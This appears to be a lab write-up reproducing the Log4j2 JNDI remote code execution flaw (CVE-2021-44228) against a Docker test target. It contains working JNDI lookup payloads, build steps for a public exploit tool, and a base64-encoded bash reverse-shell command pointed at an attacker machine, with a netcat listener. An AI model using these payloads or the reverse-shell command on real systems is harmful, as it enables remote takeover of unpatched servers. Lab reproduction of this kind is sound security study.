Apache Log4j2 RCE vulnerability reappears
1. Vulnerability introduction
Apache Log4j2 is a Java logging component. In certain versions, the lookup function is enabled, resulting in a remote code execution vulnerability.
Affected versions: Apache Log4j 2.x<=2.15.0.rc1
Vulnerability number: CVE-2021-44228
2. Vulnerability environment construction
Topic: Ubuntu ip: 192.168.241.129
Attack machine : kail ip: 192.168.241.128
Since my Ubuntu virtual machine has already been set up with docker, I can directly use the following command to download the vulnerability image.
sudo docker pull vulfocus/log4j2-rce-2021-12-09:latest
Pull the local environment and run it, and start the local command:
sudo docker run -itd -p 8080:8080 vulfocus/log4j2-rce-2021-12-09:latest
If you do not have docker installed, you can access Vulfocus and use the shooting range environment:
https://github.com/fofapro/vulfocus
After setting up, access the virtual machine IP and port:
http://192.168.241.129:8080
3. Vulnerability recurrence
1. Perform DNSLog verification
Via DNSLog Platform
https://dig.pm/
Obtain the subdomain name and construct the payload:
${jndi:ldap://5097bd9c.dns.1433.eu.org}
The browser clicks ??? and uses Burpsuite to capture the packet and replace the payload parameters. At this time, sending the packet will cause a server 400 error, and the pyload needs to be URL encoded.
Successfully received resolution records on the DNSLog website
2.JNDI injection rebound shell
Exploiting the vulnerability using JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar
https://github.com/welk1n/JNDI-Injection-Exploit
Tool usage:
git clone https://github.com/welk1n/JNDI-Injection-Exploit.git
cd JNDI-Injection-Exploit
mvn clean package -DskipTests
Use the mvn command to generate JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar. You need to confirm the maven installation before using the mvn command.
Use command
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar [-C] [command] [-A] [address]
Rebound shell command
bash -i >& /dev/tcp/ip/port 0>&1 //需要base64加密
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjI0MS4xMjgvNDQ0NCAwPiYx}|{base64,-d}|{bash,-i}" -A 192.168.241.128
You can see that 5 links are generated
rmi://192.168.241.128:1099/zvrfsf
rmi://192.168.241.128:1099/xwa9m4
ldap://192.168.241.128:1389/xwa9m4
rmi://192.168.241.128:1099/e1twtt
ldap://192.168.241.128:1389/e1twtt
At this time, open another terminal and open nc to monitor:
nc -lvnp 4444 //kail
nc64.exe -lvnp 4444//windows下用cmd
At this time, the payload is forged, url is encoded, and bp is sent.
${jndi:rmi://192.168.241.128:1099/zvrfsf}} //5个链接认选一个
At this time, the following log information appears on the command line, indicating that the execution has been successful.
At this time nc has also rebounded the shell